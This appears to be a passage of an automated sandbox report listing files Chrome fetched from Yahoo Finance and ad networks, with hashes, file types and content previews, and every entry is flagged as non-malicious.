                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:vNFvB9C751WVjwftikVjlDFhJzu4OPEuJZXIRtzgtQ4/JiL:vLB6aV+tlVjlDFhpcPEid0f4xY
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:39B1BC24D49268FBB6FD0ED2211BC2C3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:3ED897D506DB3B4AAFDA8F099D83E65611B92B99
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:573308EAD9822948F266F180717858BC6E18892240B9B2311D0B9939FDE7E779
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:4251C85A71BD4B1EE4EEF0BDF4521BEAD90B11DC88F4E7CF05748D48B5C497A17F0564D455212A83B3025DD01472CB8DACA3C513968239F45E937B12AE02BA9B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/uu/api/res/1.2/tQ8F_aqdd1MTiJBsUnvEUw--~B/Zmk9c3RyaW07aD0xODA7cT04MDt3PTM1NjthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/os/creatr-uploaded-images/2024-09/35a87f10-7eff-11ef-b37e-1db661b209fc.cf.webp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:RIFF....WEBPVP8 ........*d...>y4.H$..%.Q.H...cm.7<l.g..=..w.k.YX....n.iwf..P,.........8...].1.&......S.5.........v-.....P..$(...*.HXR.i..Ai.j.:a.<...Y.6.S..8.jx...`...q5../..^.7..*.lr].20.d.{j[B....O..".. .._......TN.3....6/.. ......h.9X...;...Qv.(....sU...9..qM.@.J.|.|x.O;....];.-&..Wl4...1.A.p.........y....0v..n#{~v.-..qq3..c...=5.....P..A......w#......Xh{.I.D..N...*.(ci......V.h..&...N.51........].'7&?.H../...M1...h../...........E...[f!i...o.p...F.T..........c:a;..r.n.........._.o.t3.......3..GK.y.h2.|....S[..@.N0s.{#Cm..r6...}y@e7.S.ER1./"g.=9.R].7,h.#B.....SpM.|S4.b........8./.._..`..U......f....1.....4.U..../.,j="!.:...........R.S......3.zVo..u.}.......Y95s....i........k ..}.......9.LU..V.g-.3..#.C..x).......uv';^.j..cK.T.3.=...!...;.b..^.f.'.........y.8H...x$...O/...Gkj.A.k..m.u..P..:i.z.s./..1o2.F|_trJ./M.f........i.h..2.......'VO.%.h.......FN....0'-...h.7(.*..G.|....).+R=.y.x4...gh...................E....B.G...&27..8..*.....7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (64457), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):67717
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.404608504229257
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:2UI64yjnvD+FnD6Ug0NAohpuGKOGALvCqk8B4B3OYJKnGvK:TzvDAgoqi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6EA12FCCBED15820786C87F0B9B67D61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:0B1945893B1F90112CB7B1615DD751A17F0BE14F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:CBEEE7DA6CC21D0D3394C55FAB07C9005D10405A505117CB41C2A1B013773B97
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:D06684BA7C541FA5CE2879FAE1632B1996475A3CCE1E7384F396E07010BFC336F2A9A976D07E9A1F97C2620D70B6F465F216E6EDF4243C0245C8FA51772CF072
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/aaq/hc/homepage-pwa-defer-1.1.6.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("HomepageClient",[],t):"object"==typeof exports?exports.HomepageClient=t():e.HomepageClient=t()}("undefined"!=typeof self?self:this,function(){return function(e){function t(n){if(o[n])return o[n].exports;var r=o[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,t),r.l=!0,r.exports}var n=window.webpackJsonpHomepageClient;window.webpackJsonpHomepageClient=function(t,o,i){for(var a,s,c=0,l=[];c<t.length;c++)s=t[c],r[s]&&l.push(r[s][0]),r[s]=0;for(a in o)Object.prototype.hasOwnProperty.call(o,a)&&(e[a]=o[a]);for(n&&n(t,o,i);l.length;)l.shift()()};var o={},r={1:0,2:0};return t.e=function(e){function n(){s.onerror=s.onload=null,clearTimeout(c);var t=r[e];0!==t&&(t&&t[1](new Error("Loading chunk "+e+" failed.")),r[e]=void 0)}var o=r[e];if(0===o)return new Promise(function(e){e()});if(o)return o[2];var i=new Promise(function(t,n){o=r[e]=[t,n]});o[2]=i;v
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (20717)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):20719
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.563835546790689
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:g1Ij/LcZpnh3eIAT4yfZvjZwEOXI4dMODMfr38ebmAjDRh2DC16GmPn:g1aA/h3eIu4yfxjWE4I4dMODMfr38ebQ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:F005A5FDF9637F500D28CD8B91363045
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:9DFE48A2BD40A6AAF5D440F507D749654E1E355D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:89EF14460564B303F7F56369F7F0EDF39734C7D447CB4A76328474CB4F286ABE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:DCD50FBDC6774937AFD148FFB1F6D2077A33667DD3DB7F884D2A8D0BC6F994F132FD3CE0D4D23DA4A6D16182EA257883841571A70E0FE3D696C16BEE04359164
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as x,e as W,b as G,d as Q,f as ne,j as B,i as E,q as h,k as d,l as ae,y as Me,t as K,h as z,m as Oe,G as Te,v as ke,n as re,p as U,x as ye,L as _e}from"./scheduler.Dsuh-FKt.js";import{S as se,i as oe,t as _,g as Z,a as g,e as J,c as b,b as P,m as k,d as y}from"./index.CvwOawEI.js";import{I as Ye,i as we,s as Ue}from"./chartUtil.-voOXoQ6.js";import{t as A,g as w,s as ve,m as Ve,a6 as Ee}from"./commonUtil.BWwawKjd.js";import{B as le}from"./Button.C2rixdaC.js";import{C as He}from"./calendar_today.FjAU0N44.js";import{T as Fe}from"./Tabs.6aO2IOBS.js";import{e as he}from"./each.CI2tb2RB.js";import{S as Ge,O as Be}from"./Select.DMUNtRO-.js";import{I as qe}from"./Icon.C8w5V9EK.js";import{L as We}from"./Link.vSNQugO0.js";import{E as Qe}from"./open_in_full.BywbHFZf.js";const Ke="Add Symbol",ze="Are you sure you want to remove",$e="Bearish",je="Bullish",Xe="Change",Ze="% Change",Je="Close price",xe=". {{year}} Yahoo. All rights reserved.In partnership with ChartIQ",et="Confirm Delete",t
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, WAVE audio, IEEE Float, stereo 44100 Hz
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):80336
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.269936136252251
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:SeUkTzc2ZSN8XQ9NbA2PentRJ2wADNXh/xuEU0bI799K:S9wzBZw8XQP5WSNXh/I0Iy
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:F536E8F265FBBD76A5F7B9FC0EA0AD69
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8DB474F6CA6E7548D47CC3B078E66ABDD5719066
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:63678162CB830AFBA8013A29BE9148C72C3DD90561F1B0E7A3CDFBFD883912D6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:2D8D79BF7DD4DDD61B871B3E54E61972CFD2CAD17F11865707E006A4F9FFADA7B9B2524A1F7CE056AEFD2B36E43264A813FD9ECE00B3182D034AEE5FB84A75D0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/pv/static/misc/voice-result-202105050733.wav:2f81efb76bc820:0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:RIFF.9..WAVEfmt ........D... b.... .dataH...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1650
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.159978002033735
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:tCbYLbGPGuXVGTTGzGeLGSoGQlnGMGl8YolNBa4xYZHnRDaHjjOtKwS7xDSyFYxT:Di+huqUGSbQMHmlNQulQKxM
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:03C10F2C4E36A75805F7735D1F07C98C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:DAEF61F97758BEF6CE593D34998F5F8EA7E20E7D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:0F7D51EA19F78212DBF64706C7CCEB771E3D7B6390057BD4E44355B2850B1DA5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:26C726B47435AAF67BA01633AA75F50E48718A494FF19C0E2BD9AD58D070508AE9C8A14255EA0BF5A754BFBA2F6C4BD4D20632A31464478DF74EE68F10C59465
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:<svg width="48" height="48" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. <defs>. <linearGradient x1="-36.396%" y1="32.854%" x2="33.396%" y2="133.313%" id="a">. <stop stop-color="#FFF5B2" offset=".013%"/>. <stop stop-color="#FFDE00" offset="39.944%"/>. <stop stop-color="#FFA700" offset="100%"/>. </linearGradient>. <linearGradient x1="115.053%" y1="97.289%" x2="115.053%" y2="-17.557%" id="b">. <stop stop-color="#FFB92B" stop-opacity=".05" offset="0%"/>. <stop stop-color="#FF6900" offset="100%"/>. </linearGradient>. <linearGradient x1="64.278%" y1="100%" x2="64.278%" y2="1.351%" id="c">. <stop stop-color="#B5BDC8" offset="0%"/>. <stop stop-color="#C7CDD2" offset="21.044%"/>. <stop stop-color="#E5EBEF" offset="100%"/>. </linearGradient>. <path d="M20.464 26.12c-4.225-.75-8.257 2.1-9.051 6.396a5.422 5.422 0 00-5.252 2.062 5.67 5.67 0 00-.693 5.694 3.006 3.006 0 002.792 1.727h10.855c4.085.022 7.5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (550)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):551
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.862676238563539
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:1Rv9DR7mAn5C8Vk2Geh9RqAasuYNANd2o:1RVNiIVtSYNfo
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:BE7536A3B7664D05C1F2AF95F9199B4C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:858B902FB2E813960D3B3E3956234B49F5AED749
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:C45B108946DEBFE710066CF0E22E4B685AD13C3A854E4B4794334A54F0918F26
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:3355DD9722120FC2B7FB340CDB52C2DCBE18CC4F3D9D2A3491976529BF3D08BA13C049BEADAA142B1AC323B6AA837D06D09D95A07A610F1FF8732D02393FA788
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/Conversations.B_TraoWY.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.container.yf-1ebwrs9.yf-1ebwrs9{position:relative;z-index:1;margin-top:calc(-1 * var(--layout-gutter))}.container.mt0.yf-1ebwrs9.yf-1ebwrs9{margin-top:-3rem;margin-bottom:-2rem}.loading.yf-1ebwrs9.yf-1ebwrs9{height:9rem}.error.yf-1ebwrs9.yf-1ebwrs9{color:var(--text2);display:flex;flex-direction:column;align-items:center;justify-content:center;font-size:var(--font-2xl);font-weight:var(--font-bold);gap:var(--space-2);padding-block:var(--space-5)}.error.yf-1ebwrs9 p.yf-1ebwrs9:nth-of-type(2){font-size:var(--font-l);font-weight:var(--font-normal)}.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.990210155325004
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (2008)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):13020
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.338335125035746
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:pl/66sGOASROqI3wgh5MXnYY9EAhMmK3qzfaGxCLLgIJQaYmx:rnsGN6JIVs3LLK3qzf6gIZYmx
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:D1F231B50B152372A6C3100F4AED1973
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:1BF10951BE06DA03D1371A904E19C0419F2A3637
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:9DEC95894AF322B087AB6E87F9C8CE66D849646CF33B375D33C957F4569ED081
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:00093B7FC4AFFA2D2230622F5D7DA69730246B74620AD4DE30AC64E41FB9AC927AFD2AB426034D71DC85A3DFEE9A46E73DF48DA7E2636A54579EA9AAAC4CAFF6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://tpc.googlesyndication.com/sodar/sodar2/232/runner.html
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:<!DOCTYPE html>.<meta charset=utf-8><script>.(function(){'use strict';function m(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var p=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function aa(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var r=aa(this),u=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",v={},w={};function x(a,b,c){if(!c||a!=null){c=w[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}}.function y(a,b,c){if(b)a:{var e=a.split(".");a=e.length===1;var f=e[0],h;!a&&f in v?h=v:h=r;for(f=0;f<e.length-1;f++){var d=e[f];if(!(d in h))break a;h=h[d]}e=e[e.length-1];c=u&&c==="es6"?h[e]:null;b=b(c);b!=null&&(a?p(v,e,{config
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (8254), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):8254
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.339222492199265
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:6EuL8zG7CAQyinBudEIrfp4CrxdHtxVhyQRyfTSTvTsTyT2Y3mkot:juL8uCByinBxmB4CrxtTHySyfWDYOyY8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:1ED4FE71B1FC647DDBF37A7050944309
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:7D959D812262C51C4C11D7D31BE040692248F438
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:FAF50015DE5B96281DCBF145FDF58222EFC35C962759A3E915F4E95F510D7B78
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:7E1332BF492D83256CD7E6507811FA188D3D1F23659B4697C15563254B77E8184CF3E23064D5E9DFD4A22229DAD02EA300FE57CF4E77C4093D8F29C6B1DFD0EA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:window.wafer&&window.wafer.ready((function(){var e="show-drawer",t=null,a=null,r="wafer-fetch-error",i="wafer-fetch-complete",n="stream-related-drawer",o="StreamRelated",s="react-wafer-stream",c="json",d="wafer-fetch",l="stream-uuid-list",u=[],w=document.querySelectorAll(".stream-items"),m=window.innerWidth||document.documentElement.clientWidth,f="js-sponsored-moments-dwell-time",A=window.wafer&&window.wafer.utils,g={INARTICLE:9/16,reservemoments:16/9},p=function e(t){var a,r,i=t.getAttribute("data-da-position");if("reservemoments"===i&&(t=t.querySelector("#defaultRESERVEMOMENTS")),a=t.getAttribute("data-html"),r=t.getAttribute("data-darla-config"),a&&r){(r=JSON.parse(r)).dest;var n=window.DARLA.prefetched();if(!window.DARLA.config()||window.DARLA.inProgress()||n&&0!==n.length)setTimeout((function(){e(t)}),500);else{if(!r.h&&!r.w){var o=Math.floor(m*g[i]),s={flex:{h:{min:o},w:{min:m}},h:o,w:m};Object.assign(r,s)}var c=r.id;window.DARLA.addPos(r);var d=new window.DARLA.Response(c,{});a=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (2146)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.668791477006674
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:f1bvfJR4P/MKlPigE8FwnthFquTeUzkHe8yaWnJkLIJ9R2yB9MyL:tzfX4PEK5fgFFjzkHTj06k3R7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:920801337E26567FFCABEFA121E11C38
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:D6ECA7179302716844E8B7A361B9C7CE647A606D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:F0320CDD183EC54DF434D5EC35EE9C0374EB4F3263DE80687FABE45DDC9A688D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:78022CE0AAF1C3DF8A2D58F70B63CDE0BCDEF9E7A74839541780FA34E9B2073B641B4AF8393F6E3D5C26D39E93411A48EBAD9945A0772B8973137BA25073D306
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://prebid.a-mo.net/isyn?gdpr=0&gdpr_consent=&us_privacy=1YNN&gpp=DBAA&gpp_sid=-1&s=pbs&cb=https%3A%2F%2Fpbs.yahoo.com%2Fsetuid%3Fbidder%3Damx%26gdpr%3D0%26gdpr_consent%3D%26gpp%3DDBAA%26gpp_sid%3D-1%26f%3Db%26uid%3D%24UID
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:<script src="https://assets.a-mo.net/js/cframe.js#gdpr=0&gdpr_consent=&cc=US"></script>.<script>__am$CK(["https://x.bidswitch.net/sync?ssp=adaptmx&user_id=85b2d118-423d-4245-b001-a881df171c6a&gdpr={{GDPR}}&gdpr_consent={{GDPR_CONSENT}}&us_privacy={{US_PRIVACY}}&gpp={{GPP_STRING}}&gpp_sid={{GPP_SID}}","https://pixel.rubiconproject.com/exchange/sync.php?p=pbs-adaptmx&gdpr={{GDPR}}&gdpr_consent={{GDPR_CONSENT}}&us_privacy={{US_PRIVACY}}","https://id.a-mx.com/u?&gdpr={{GDPR}}&gdpr_consent={{GDPR_CONSENT}}&us_privacy={{US_PRIVACY}}&gpp={{GPP_STRING}}&gpp_sid={{GPP_SID}}&cb=https%3A%2F%2Fsync.a-mo.net%2Fsetuid%3FA%3D85b2d118-423d-4245-b001-a881df171c6a%26bidder%3Damx_com%26uid%3D","https://rtb.openx.net/sync/prebid?&gdpr={{GDPR}}&gdpr_consent={{GDPR_CONSENT}}&us_privacy={{US_PRIVACY}}&r=https%3A%2F%2Fsync.a-mo.net%2Fsetuid%3FA%3D85b2d118-423d-4245-b001-a881df171c6a%26bidder%3Dopenx%26uid%3D%24%7BUID%7D","https://cm.adform.net/cookie?&gdpr={{GDPR}}&gdpr_consent={{GDPR_CONSENT}}&us_privacy={{U
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (15896), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):15896
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.503616373683869
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:GGJ01yJn5yOIVmxV/ZUN/4hDEwu85wWoJNmpPvIE:GGJ00JngOCyZ+8l2Wush
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C73E0CB111244BC0796DA0E83348068B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:C83D2843508D6BA4827C2DCA0670FFBDD4F1E4ED
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:9913C1ABBE147B7CC94C91FBE26B22D24F72B98F4DA5514D376A473B3D10ACD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:9DF2085B42D146263164156B483EFEBB829DD49434591A2F511A4DE31E69A469DB4612C200382A9CABE10F11A3C5C52EB89AC7590F02149367BB144AC65E6CD9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://ads.pubmatic.com/AdServer/js/user_sync.html?p=159463&userIdMacro=PM_UID&predirect=https%3A%2F%2Fcontextual.media.net%2Fcksync.php%3Fcs%3D8%26type%3Dpba%26gdpr%3D0%26gdpr_consent%3D%26ovsid%3DPM_UID
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:<html><body><script type="text/javascript">(function(){var aa=window,p=navigator,ai=aa.top||aa,aj=aa.location.search.substr(1),A=encodeURIComponent,W=decodeURIComponent,aA=aa.parseInt,P=aa.PubMatic||(aa.PubMatic={}),K=0,ad=0,b=0,ao="pubmatic.com",V="ads."+ao,al=1,Q="https://",a=(aa.__cmp?1:0),an=function(aF){return typeof aF==="function"},au=console.log.bind(console,"PubMatic:"),at=function(aJ,aI){var aG=0,aF=aJ.length,aH=false;for(;aG<aF;aG++){if(aJ[aG]===aI){aH=true;break}}return aH},n=function(aF,aI){var aH=aa.document.createElement("script");aH.type="text/javascript";aH.src=aF;aH.async=true;if(an(aI)){aH.onload=aH.onreadystatechange=aI}var aG=aa.document.getElementsByTagName("script")[0];aG&&aG.parentNode&&an(aG.parentNode.appendChild)&&aG.parentNode.appendChild(aH)},aq=function(aH){var aG=aa.document.createElement("iframe");aG.src=aH;aG.style.height="0px";aG.style.width="0px";aG.style.display="none";aG.height=0;aG.width=0;aG.border="0px";aG.hspace="0";aG.vspace="0";aG.marginWidth=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (4827)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):4828
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.038882040482278
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:oXktjmc6c1JcG9uxfa9lOFUah4Op2Lm92yj4Gq7:oUtjmRecG9Ufa9lOFUahgm91j4Gq
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:CA374EE41A3097ABDCCB0397CF593145
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:F23500B799D648EE4C1D867F516DB4370DD91795
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:EBA384DCB72F1BC52549871544B9BC2C69F760E30DEFAC09AD96ADD253F1EBAA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:ADEEF32F7D61AB78553A9CE2D1B3A89F66A0F536C2705311C230BA6925655178A07F81D341DBC07E2D1889BC209328EB90B96A5D0B3F8A0CAA47FB314D1C5A4E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/Layout.Cie9yXEc.css
